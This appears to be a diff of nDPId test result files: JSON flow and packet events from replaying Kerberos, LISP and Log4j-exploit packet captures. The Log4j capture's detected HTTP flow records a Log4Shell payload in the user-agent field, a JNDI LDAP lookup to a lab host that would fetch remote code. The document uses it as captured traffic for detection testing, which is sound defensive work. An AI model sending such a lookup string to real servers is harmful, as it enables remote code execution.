00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"kerberos_fuzz.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-data-len":260,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1633884084000}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 1/1

24
test/results/lisp_registration.pcap.out
View File

@@ -5,25 +5,25 @@
00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152685554,"flow_last_seen":1597152685554,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1597152685554,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}}
00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1597152685555,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1597152685555,"pkt":"qrvMAAEAqrvMAAIACABFwACAAJcAAP8RsBIKAHsCCgB7ARD2EPYAbMDFMgABAT470dH4ChLaAAEAFJgCmsMIGdOV75RgmwLw3u2YWic1AAAFoAGAEAAAAAAC\/AAAAAAAAAAAAAAAAAAAAhYWFhYABQABCgB7AtD01FgUttPjIYPJQy5LWPIAAAAAAAAAAA=="}
00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1597152685555,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1597152685555,"pkt":"qrvMAAEAqrvMAAIACABFwACAAJgAAP8RsBEKAHsCCgB7ARD2EPYAbFMcMgABAecEMPyhgJYjAAEAFLR7gLhELdB05V0IZvC04Du3TwxeAAAFoAEaEAAAAEADAAACIAAKAAAAZAABwKhmABYWFhYABQABCgB7AtD01FgUttPjIYPJQy5LWPIAAAAAAAAAAA=="}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152687289,"flow_last_seen":1597152687289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1597152687289,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1597152687289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152687289,"pkt":"qrvMAAEAqrvMAAIACABFwAAs6QkAAP8Gx\/4KAHsCCgB7ATwNEPYND3HOAAAAAGACQACCQgAAAgQFtAAA"}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1597152687290,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152687290,"pkt":"qrvMAAIAqrvMAAEACABFwAAszvYAAP8G4hEKAHsBCgB7AhD2PA22haFWDQ9xz2ASQAAqVQAAAgQFtAAA"}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1597152687291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1597152687291,"pkt":"qrvMAAEAqrvMAAIACABFwAAo6QoAAP8GyAEKAHsCCgB7ATwNEPYND3HPtoWhV1AQQABCEgAAAAAAAAAA"}
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152687289,"flow_last_seen":1597152687436,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152687436,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152687289,"flow_last_seen":1597152687289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1597152687289,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1597152687289,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152687289,"pkt":"qrvMAAEAqrvMAAIACABFwAAs6QkAAP8Gx\/4KAHsCCgB7ATwNEPYND3HOAAAAAGACQACCQgAAAgQFtAAA"}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1597152687290,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152687290,"pkt":"qrvMAAIAqrvMAAEACABFwAAszvYAAP8G4hEKAHsBCgB7AhD2PA22haFWDQ9xz2ASQAAqVQAAAgQFtAAA"}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1597152687291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1597152687291,"pkt":"qrvMAAEAqrvMAAIACABFwAAo6QoAAP8GyAEKAHsCCgB7ATwNEPYND3HPtoWhV1AQQABCEgAAAAAAAAAA"}
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152687289,"flow_last_seen":1597152687436,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152687436,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152709936,"flow_last_seen":1597152709936,"flow_idle_time":180000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1597152709936,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1597152709936,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":1597152709936,"pkt":"qrvMAAEAqrvMAAMACABFwACQAEwAAP8RsEwKAHsDCgB7ARD2EPYAfBP6MgABAnsDNrGOEKjEAAEAFGka+80ImORwcY2JmGWtrFsZgmcCAAAFoAEaEAAAAAABwKhnAP8hISEABQABCgB7AwAABaABIBAAAAAAAQoAAAMhISEhAAUAAQoAewNZ6z+5+pkdP+8AUonJfzt9AAAAAAAAAAA="}
00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152709936,"flow_last_seen":1597152709936,"flow_idle_time":180000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1597152709936,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}}
00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1597152709936,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1597152709936,"pkt":"qrvMAAEAqrvMAAMACABFwACoAE0AAP8RsDMKAHsDCgB7ARD2EPYAlFlmMgABAqopDMUFFm31AAEAFBocdBgtY+Hz9Ueh9UZxQJ1vv2IjAAAFoAFAEAAAAAAC\/AABkgFoAQMAAAAAAAAAAP8hISEABQABCgB7AwAABaABgBAAAAAAAvwAAAAAAAAAAAAAAAAAAAMhISEhAAUAAQoAewNZ6z+5+pkdP+8AUonJfzt9AAAAAAAAAAA="}
00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1597152709936,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1597152709936,"pkt":"qrvMAAEAqrvMAAMACABFwACAAE4AAP8RsFoKAHsDCgB7ARD2EPYAbDmBMgABAXFyKntOHooaAAEAFI0ikSo37n3NSMdaLlvkb41n5QfMAAAFoAEaEAAAAEADAAACIAAKAAAAZAABwKhnACEhISEABQABCgB7A1nrP7n6mR0\/7wBSicl\/O30AAAAAAAAAAA=="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152711673,"flow_last_seen":1597152711673,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1597152711673,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1597152711673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152711673,"pkt":"qrvMAAEAqrvMAAMACABFwAAsuMMAAP8G+EMKAHsDCgB7Ac8DEPZkcBpBAAAAAGACQADvdgAAAgQFtAAA"}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1597152711674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152711674,"pkt":"qrvMAAMAqrvMAAEACABFwAAsBk8AAP8GqrgKAHsBCgB7AxD2zwMtqeWdZHAaQmASQADcHgAAAgQFtAAA"}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1597152711674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1597152711674,"pkt":"qrvMAAEAqrvMAAMACABFwAAouMQAAP8G+EYKAHsDCgB7Ac8DEPZkcBpCLanlnlAQQADz2wAAAAAAAAAA"}
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152711673,"flow_last_seen":1597152711820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152711820,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}}
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152711673,"flow_last_seen":1597152712034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":660,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1597152711673,"flow_last_seen":1597152711673,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1597152711673,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1597152711673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152711673,"pkt":"qrvMAAEAqrvMAAMACABFwAAsuMMAAP8G+EMKAHsDCgB7Ac8DEPZkcBpBAAAAAGACQADvdgAAAgQFtAAA"}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1597152711674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1597152711674,"pkt":"qrvMAAMAqrvMAAEACABFwAAsBk8AAP8GqrgKAHsBCgB7AxD2zwMtqeWdZHAaQmASQADcHgAAAgQFtAAA"}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1597152711674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1597152711674,"pkt":"qrvMAAEAqrvMAAMACABFwAAouMQAAP8G+EYKAHsDCgB7Ac8DEPZkcBpCLanlnlAQQADz2wAAAAAAAAAA"}
00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1597152711673,"flow_last_seen":1597152711820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1597152711820,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}}
00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152711673,"flow_last_seen":1597152712034,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":660,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":52995,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}}
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1597152709936,"flow_last_seen":1597152709943,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":868,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.3","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}}
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1597152685554,"flow_last_seen":1597152685560,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":4342,"dst_port":4342,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152687289,"flow_last_seen":1597152687645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":915,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1597152687289,"flow_last_seen":1597152687645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":915,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1597152712034,"l3_proto":"ip4","src_ip":"10.0.123.2","dst_ip":"10.0.123.1","src_port":15373,"dst_port":4342,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LISP","breed":"Acceptable","category":"Cloud"}}
00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"lisp_registration.pcap","alias":"nDPId-test","packets-captured":30,"packets-processed":30,"total-skipped-flows":0,"total-l4-data-len":3790,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":27,"global_ts_msec":1597152712034}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 30/30

86
test/results/log4j-webapp-exploit.pcap.out
View File

@@ -1,56 +1,56 @@
00471{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1639425815407}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815407,"flow_last_seen":1639425815407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815407,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639425815407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADxjYEAAPQamLqwQ7gGsEO4KB8AfkHmWgrEAAAAAoAL68JU2AAACBAW0BAIICq34shoAAAAAAQMDBw=="}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639425815407,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADwAAEAAQAYGj6wQ7gqsEO4BH5AHwIo9\/lB5loKyoBJxIDRcAAACBAW0BAIICmhBAYSt+LIaAQMDBw=="}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639425815408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815408,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADRjYUAAPQamNawQ7gGsEO4KB8AfkHmWgrKKPf5RgBAB9sqWAAABAQgKrfiyHGhBAYQ="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815407,"flow_last_seen":1639425815415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":646,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1639425815415,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.13.31","url":"192.168.13.31:8080\/log4shell\/login","code":0,"content_type":"","user_agent":"jndi:ldap:\/\/172.16.238.11:1389\/a"}}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815407,"flow_last_seen":1639425815407,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815407,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
